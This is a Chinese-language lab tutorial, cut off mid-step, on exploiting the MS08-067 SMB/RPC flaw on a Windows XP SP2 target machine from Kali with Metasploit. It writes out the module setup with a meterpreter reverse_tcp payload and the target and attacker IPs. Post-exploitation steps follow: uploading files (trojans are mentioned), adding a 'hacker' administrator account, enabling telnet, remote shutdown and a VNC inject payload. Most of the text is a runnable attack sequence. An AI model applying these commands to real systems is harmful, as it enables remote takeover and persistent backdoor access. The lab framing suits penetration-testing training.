利用 ms08-067 漏洞入侵靶机 win xp2 并利用 meterpreter 进行深入渗透
一、漏洞简介
MS08-067 漏洞将会影响 Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本 甚至还包括测试
阶段的 Windows 7 Pro-Beta。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执
行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003系统上,攻击者可能未经
身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火
墙配置有助于保护网络资源免受从企业外部发起的攻击。
二、网络拓扑
三、实现步骤
1,首先确定 kali 为攻击机 windows xp2 为靶机 需打开 445 端口 默认为打开。然后 在 kali终端
输入 msfconsole 启动 Metasploit 工具。
2,输入命令 search ms08_067,查找关于 ms08_067 的漏洞模块。
3,输入如下命令 使用该漏洞模块
4,进入这个模块后 用 show options 查看该模块需要配置的参数
5,设置靶机 IP(xp2):
- set RHOST 192.168.100.144
复制代码
设置要执行的 payload:
- set payload windows/meterpreter/reverse_tcp
复制代码
设置攻击机的 IP(kali):
- set LHOST 192.168.100.143
复制代码
设置要攻击的目标操作系统类型:
用 show options 查看相关参数是否配置正确
6,最后, 输入 exploit 回车运行,进入到特殊的 payload---meterpreter 该 payload 在控制靶机之后能够对
靶机执行更多的渗透攻击。用 pwd 查看靶机当前的工作路径 用 ipconfig 命令查看靶机的 IP地址配置。
7,通过 help 命令 可以查看在 Meterpreter 下可以使用的命令及功能简介
8,输入 shell 命令进入 WINXP并在C盘下创建一个文件夹
9,按 CTRL+Z或输入 exit返回 meterpreter
10,将 saminside 文件夹 该文件夹可以是任意文件夹, 拷贝到 KALI 的 root用户下
11,将 KALI 下的 saminside 文件夹使用 upload 命令上传到 windows xp 的C:/saminside 中
12,在 XP 中查看已上传成功的文件(也可以通过该命令上传木马程序等)
13,拿到 Windows XP 的控制权后 可以使用 Windows XP系统自带的命令添加用户用户 hacker 改为自己姓
名拼音小写首字母密码自己设置一个 将该用户添加到管理员组 让该用户具体管理员的权限;利用命令开启
Windows XP的 telnet 服务,用于远程登录 Windows XP。
net user hacker 123456 /add
//以上使用 net 命令在 Windows XP 中添加了一个用户 名为:hacker 密码为:123456
net localgroup administrators hacker /add
//以上使用 net 命令 把 hacker 用户添加到 Administrators 管理员组中
sc config tlntsvr start= auto
//以上命令把 Telnet 服务从禁止,改为自动启动
sc start tlntsvr //启动 Telnet 服务
14,在 Kali 上用命令 telnet 远程登录到 windows xp
15,拿到 Windows XP 的控制权后可以对靶机进行控制如在攻击机上输入shutdown –r关机
到靶机上可以看到关闭系统倒计时的窗口。
16,在攻击机上输入 shutdown –a:取消关机
17,使用 VNC,远程控制靶机
1) background
2) set payload windows/vncinject/reverse_tcp
3) set viewonly no
|